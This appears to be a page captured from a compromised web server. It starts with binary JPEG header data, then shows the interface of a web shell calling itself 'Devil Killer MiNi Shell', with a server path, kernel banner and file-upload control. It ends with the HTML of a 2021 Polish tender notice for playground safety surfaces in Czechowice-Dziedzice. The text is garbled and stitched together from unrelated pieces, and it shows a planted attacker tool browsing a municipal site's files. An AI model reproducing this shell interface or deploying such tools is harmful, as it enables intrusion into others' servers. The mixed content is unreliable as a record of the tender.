JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20211109/0026325401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa nawierzchni bezpiecznych na placach zabaw w Czechowicach-Dziedzicach – z podziałem na zadania.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZECHOWICE-DZIEDZICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258121</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Pawła II 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czechowice-Dziedzice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-502</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@um.czechowice-dziedzice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czechowice-dziedzice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa nawierzchni bezpiecznych na placach zabaw w Czechowicach-Dziedzicach – z podziałem na zadania.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a22cfd26-414c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00263254</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000701/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Budowa nawierzchni bezpiecznych na placach zabaw</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://czechowice-dziedzice.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://czechowice-dziedzice.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://czechowice-dziedzice.logintrade.net/rejestracja/ustawowe.html<br/>oraz zaakceptować regulamin korzystania z Platformy przetargowej dostępny pod adresem:<br/>https://czechowice-dziedzice.logintrade.net/rejestracja/regulamin.html<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej - pod adresem:<br/>https://czechowice-dziedzice.logintrade.net/rejestracja/instrukcja.html<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.<br/>Logintrade S.A., ul. Legnicka 57d, lokal B/J, 54-203 Wrocław, nr tel. +48 71 787 35 34, e-mail:<br/>helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8.00 – 16.00.<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach<br/>użytkowników Platformy przetargowej.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 Ustawy Pzp, podmiotowe środki dowodowe,<br/>w tym oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy Pzp, oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118 ust. 3 Ustawy Pzp, zwane dalej „zobowiązaniem<br/>podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art.<br/>18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których<br/>mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Zamawiający informuje, iż w przypadku przesyłania przez Wykonawcę dokumentów elektronicznych<br/>skompresowanych (w tym oferty przetargowej) dopuszczone są wyłącznie formaty danych wskazane w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. (t.j. Dz. U. z 2017 r., poz. 2247) w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Powyższe oznacza, iż Zamawiający nie dopuszcza przysyłania dokumentów elektronicznych (w tym<br/>oferty) skompresowanych formatem .rar<br/>9. Pozostałe postanowienia zgodne z SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://czechowice-dziedzice.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>-administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim w<br/>Czechowicach-Dziedzicach jest Burmistrz Czechowic-Dziedzic z siedzibą w Czechowicach-<br/>Dziedzicach pl. Jana Pawła II 1;<br/>-administrator wyznaczył Inspektora Danych Osobowych, z którym można się skontaktować pod<br/>numerem telefonu 32 21 47 153;<br/>-Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie przedmiotowego zamówienia publicznego;<br/>-odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp, osoby lub podmioty,<br/>którym na podstawie przepisów prawa przysługuje prawo do kontroli, jak również osoby lub podmioty,<br/>którym dane zostaną udostępnione w oparciu o przepisy ustawy z dnia 6 września 2001r. o dostępie do<br/>informacji publicznej;<br/>-Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy; zgodnie z Rozporządzeniem Prezesa<br/>Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, teczki<br/>aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji<br/>zamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie<br/>zamówień publicznych<br/>-obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>-w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>-posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO(2);<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>-nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18<br/>ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.37.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr I<br/>Przebudowa placu zabaw na skwerze pomiędzy ul. Stefana Żeromskiego i ul. Hugona Kołłątaja<br/>oraz ul. Hutniczej w Czechowicach-Dziedzicach.<br/>Zakres prac obejmuje m.in.:<br/>a) Plac zabaw na skwerze pomiędzy ul. Stefana Żeromskiego i ul. Hugona Kołłątaja<br/>- demontaż zniszczonego ogrodzenia;<br/>- budowa nowego ogrodzenia z paneli 3D;<br/>- renowacja istniejących urządzeń zabawowych;<br/>- dostarczenie i montaż zestawu zabawowego złożonego ze zjeżdżalni, ścianki wspinaczkowej i<br/>grą integracyjną „kółko i krzyżyk”. Wysokość swobodnego upadku z podestu wieży: 1,36 m.;<br/>- wykonanie nawierzchni bezpiecznej z ażurowych płyt gumowych (płyta przerostowa)o grubości 23 mm pod urządzeniami zabawowymi. Marty przerostowe muszą posiadać niezbędny atest<br/>PZH, Certyfikat HIC 3,4 m oraz spełniać normy unijne PN-EN 1177:2009.<br/>b) Plac zabaw ul. Hutnicza<br/>- dostarczenie i montaż zestawu zabawowego złożonego ze zjeżdżalni, ścianki wspinaczkowej i<br/>grą integracyjną „kółko i krzyżyk”. Wysokość swobodnego upadku z podestu wieży: 1,36 m.;<br/>- wykonanie nawierzchni bezpiecznej z ażurowych płyt gumowych (płyta przerostowa)o grubości<br/>23 mm pod urządzeniami zabawowymi. Marty przerostowe muszą posiadać niezbędny atest<br/>PZH, Certyfikat HIC 3,4 m oraz spełniać normy unijne PN-EN 1177:2009.<br/>- przeniesienie w okolice wejścia na plac zabaw tablicy „Regulamin placu zabaw”<br/>Szczegółowy zakres prac określa specyfikacja techniczna wykonania i odbioru robót<br/>budowlanych, projekt wykonawczy oraz przedmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr II<br/>Przebudowa placu zabaw przy ul. Bestwińskiej w Czechowicach-Dziedzicach.<br/>Zakres prac obejmuje m.in.:<br/>- demontaż ogrodzenia;<br/>- wykonanie nawierzchni bezpiecznej z zaokrąglonego płukanego żwiru o frakcji od 4 do 8 mm;<br/>- doposażenie placu zabaw w huśtawkę wagową typu ważka, po uprzednim wykonaniu<br/>renowacji (urządzenie znajduje się w magazynie Urzędu Miejskiego, które pochodzi z<br/>demontażu z innego placu zabaw)<br/>Szczegółowy zakres prac określa specyfikacja techniczna wykonania i odbioru robót<br/>budowlanych, projekt wykonawczy oraz przedmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu, określone przez Zamawiającego spośród warunków, o<br/>których mowa w art. 112 ust. 2 Ustawy Pzp.:<br/>1.1. Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>1.2.Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br/>1.3.Sytuacja ekonomiczna lub finansowa<br/>1.3.1.Zamawiający uzna, że Wykonawca spełnia warunek w zakresie sytuacji ekonomicznej lub<br/>finansowej, jeżeli Wykonawca wykaże, że posiada odpowiednie ubezpieczenie<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia ze wskazaniem sumy gwarancyjnej nie mniejszej niż w wysokości:<br/>dla zadania nr I<br/>45 000,00 zł (słownie: czterdzieści pięć tysięcy złotych 00/100);<br/>dla zadania nr II<br/>35 000,00 zł (słownie: trzydzieści pięć tysięcy złotych 00/100);<br/>Wykonawca składając ofertę na więcej niż jedno zadanie zamówienia (tzn. na zadanie nr I oraz<br/>zadanie nr II łącznie) winien na potwierdzenie spełnienia ww. warunku udziału w postępowaniu<br/>wykazać posiadanie odpowiedniego ubezpieczenia odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej nie mniejszej niż w wysokości 80 000,00 zł brutto.<br/>1.1. Zdolność techniczna lub zawodowa:<br/>1.1.1. Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub<br/>zawodowej, jeżeli wykaże, że:<br/>• nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy<br/>to w tym okresie, wykonał co najmniej jedną (1) robotę odpowiadającą swoim rodzajem i<br/>wartością robocie stanowiącej przedmiot zamówienia tj.:<br/>o wykonanie budowy lub przebudowy lub remontu nawierzchni bezpiecznej lub budowy,<br/>przebudowy lub remontu placu zabaw o wartości min.:<br/>dla zadania nr I - 45 000,00 zł brutto<br/>dla zadania nr II – 35 000,00 zł brutto<br/>Wykonawca składając ofertę na więcej niż jedno zadanie zamówienia może na potwierdzenie<br/>spełnienia ww. warunku udziału w postępowaniu wskazać tą samą robotę budowlaną dla kilku<br/>zadań pod warunkiem, że wartość tej roboty budowlanej jest co najmniej równa łącznej wartości<br/>zadań, na które składa oferty (tzn. dla zadania I oraz dla zadania II łącznie - min 80 000,00 zł<br/>brutto)<br/>W przypadku, gdy wykazywane roboty budowlane, są częścią większego zamówienia<br/>dotyczącego szerszego zakresu robót, należy podać w wykazie robót budowlanych tylko<br/>informacje potwierdzające spełnianie ww. warunku.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji roboty budowlano wykonawczej<br/>wspólnie z innymi wykonawcami, należy wykazać robotę budowlaną, w której Wykonawca<br/>bezpośrednio uczestniczył.<br/>W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków udziału,<br/>waluty innej niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na<br/>dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu<br/>internetowym Urzędu Zamówień Publicznych.<br/>1.1.2. Wykonawca musi wykazać dysponowanie:<br/>dla zadania nr I<br/>• min. (1) jedną osobą zdolną do wykonania zamówienia tj. posiadającą prawo do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane 